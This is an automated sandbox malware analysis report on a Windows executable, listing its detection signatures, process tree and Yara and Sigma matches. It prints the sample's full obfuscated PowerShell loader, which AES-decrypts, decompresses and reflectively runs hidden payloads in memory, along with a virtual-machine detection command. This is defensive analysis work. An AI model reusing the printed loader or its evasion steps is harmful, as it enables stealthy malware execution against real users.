Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XgKnAQpuPM.exe

Overview

General Information

Sample name:XgKnAQpuPM.exe
renamed because original name is a hash value
Original sample name:52c1acdcbb715dd099648b26b98254e8.exe
Analysis ID:1528503
MD5:52c1acdcbb715dd099648b26b98254e8
SHA1:e3cd07adc9d8fe7c2fbb07730845af6555af2e66
SHA256:8dc774bd289aeb18dee994fea6e69039d9c6e77a1b90a0d9db004109735ef3f9
Tags:64exe
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code contains potential unpacker
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XgKnAQpuPM.exe (PID: 5192 cmdline: "C:\Users\user\Desktop\XgKnAQpuPM.exe" MD5: 52C1ACDCBB715DD099648B26B98254E8)
    • cmd.exe (PID: 5564 cmdline: cmd /c "vclib.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 5840 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • findstr.exe (PID: 6700 cmdline: findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 796 cmdline: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3352 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • WerFault.exe (PID: 3364 cmdline: C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • rundll32.exe (PID: 4064 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Process Memory Space: powershell.exe PID: 3352JoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.powershell.exe.1c691b00b88.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              7.2.powershell.exe.1c690beb3b8.8.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                7.2.powershell.exe.1c691600b50.7.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  7.2.powershell.exe.1c691b00b88.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); , CommandLine: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8M
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); , CommandLine: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8M
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XgKnAQpuPM.exe, ProcessId: 5192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c "vclib.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5564, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 3352, ProcessName: powershell.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D13214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF776D13214

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 7.2.powershell.exe.1c691b00b88.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.1c690beb3b8.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.1c691600b50.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR
                    Source: XgKnAQpuPM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
                    Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF776D12034
                    Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                    Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, Null.7.drString found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
                    Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D12D97 GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF776D12D97
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF776D11BF4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11D100_2_00007FF776D11D10
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D16F140_2_00007FF776D16F14
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D168F00_2_00007FF776D168F0
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D141B40_2_00007FF776D141B4
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D12F7B0_2_00007FF776D12F7B
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D15F800_2_00007FF776D15F80
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D11BF40_2_00007FF776D11BF4
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D15F7E0_2_00007FF776D15F7E
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exeCode function: 0_2_00007FF776D1366E0_2_00007FF776D1366E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
                    Source: XgKnAQpuPM.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3397176 bytes, 1 file, at 0x2c +A "vclib.bat", ID 885, number 1, 157 datablocks, 0x1503 compression
                    Source: XgKnAQpuPM.exeBinary or memory string: OriginalFilename vs XgKnAQpuPM.exe
                    Source: XgKnAQpuPM.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs XgKnAQpuPM.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2701
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2701Jump to behavior
                    Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: classification engineClassification label: mal92.expl.evad.winEXE@14/11@1/0
